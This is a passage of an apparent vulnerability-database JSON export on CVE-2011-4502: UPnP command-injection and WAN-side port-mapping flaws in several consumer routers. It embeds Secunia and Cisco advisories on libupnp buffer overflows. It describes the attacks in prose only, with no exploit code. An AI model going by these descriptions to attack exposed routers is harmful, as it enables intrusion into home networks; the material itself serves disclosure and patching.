"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4502",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-52447",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4502",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-364",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-52447",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to execute arbitrary commands via shell metacharacters. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. There are vulnerabilities in the Edimax Edimax EdiLinux UPnP IGD installation enablement. \nAn attacker can exploit this issue to gain unauthorized access to scan the internal host or proxy internet traffic through an affected device. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4502",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5045",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52447",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"id": "VAR-201111-0158",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "VULHUB",
"id": "VHN-52447"
}
],
"trust": 1.3453724428571427
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5045"
}
]
},
"last_update_date": "2023-12-18T12:09:29.362000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.canyon-tech.com/"
},
{
"title": "BR-6104K",
"trust": 0.8,
"url": "http://www.edimax.com/en/produce_detail.php?pd_id=58\u0026pl1_id=3\u0026pl2_id=18"
},
{
"title": "BR-6114Wg",
"trust": 0.8,
"url": "http://www.edimax.co.uk/en/produce_detail.php?pd_id=146\u0026pl1_id=1\u0026pl2_id=48"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sitecom.com/"
},
{
"title": "LB000021",
"trust": 0.8,
"url": "http://www.sweex.com/en/assortiment/internet-networking/routers/lb000021/"
},
{
"title": "Patch for Edimax \u0027Edimax EdiLinux\u0027 configuration vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6005"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-16",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 5.0,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.8,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 1.7,
"url": "http://www.upnp-hacks.org/suspect.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4502"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4502"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52447"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:05.043000",
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"date": "2011-11-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"date": "2013-01-24T00:00:00",
"db": "VULHUB",
"id": "VHN-52447"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"date": "2013-01-24T05:00:00",
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"date": "2011-11-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
],
"trust": 0.6
}
}
VAR-201111-0180
Vulnerability from variot - Updated: 2023-12-18 12:09The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5 Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1 Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1 Cisco Linksys WRT54GX firmware 2.00.05 Edimax BR-6104K prior to 3.25 Edimax 6114Wg Canyon-Tech CN-WF512 firmware version 1.83 Canyon-Tech CN-WF514 firmware version 2.08 Sitecom WL-153 prior to firmware 1.39 Sitecom WL-111 Sweex LB000021 firmware version 3.15 ZyXEL P-330W SpeedTouch 5x6 firmware versions prior to 6.2.29 Thomson TG585 firmware versions prior to 7.4.3.2. Vulnerabilities exist in the UPnP IGD installation and enablement of Edimax EdiLinux for various versions of Edimax. This vulnerability is related to the \"external forwarding\" vulnerability. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0180",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lb000021 router",
"scope": "eq",
"trust": 2.4,
"vendor": "sweex",
"version": "3.15"
},
{
"model": "6114wg router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "2.08"
},
{
"model": "br-6104k router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "3.21"
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": null
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": null
},
{
"model": "wl-153 router",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": "1.31"
},
{
"model": "wl-153 router",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": "1.34"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": null
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": null
},
{
"model": "6114wg",
"scope": "eq",
